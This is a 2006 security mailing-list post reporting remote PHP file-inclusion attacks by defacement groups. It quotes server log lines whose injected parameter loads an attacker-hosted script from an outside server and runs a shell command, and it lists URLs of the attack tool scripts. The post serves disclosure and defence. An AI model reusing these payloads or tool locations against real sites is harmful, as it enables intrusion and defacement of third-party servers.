WebApp Sec: Defacing Groups using PHP Include Attacks as Vector

[bugtraq () cgisecurity net]

For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some 
defacing groups are writing/implementing
perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). 
Below is a log snippet.

202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET 
/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET 
/webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-triv
ial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET 
/phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivia
l/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET 
/database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivia
l/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET 
/appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-triv
ial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET 
//lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.
35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET 
/archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial
/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET 
/development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-tri
vial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET 
/ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35
"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET 
//pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivi
al/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET 
/ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1.
35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET 
/appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-tri
vial/1.35"

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at 
http://www.sanicentrum.be/private/therules25.dot
and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating :)

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I've contacted sans since the parent host *appears* to be hacked. 

 - Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]


-------------------------------------------------------------------------------
Watchfire's AppScan is the industry's first and leading web application 
security testing suite, and the only solution to provide comprehensive 
remediation tasks at every level of the application. See for yourself. 
Download AppScan 6.0 today.

https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh
-------------------------------------------------------------------------------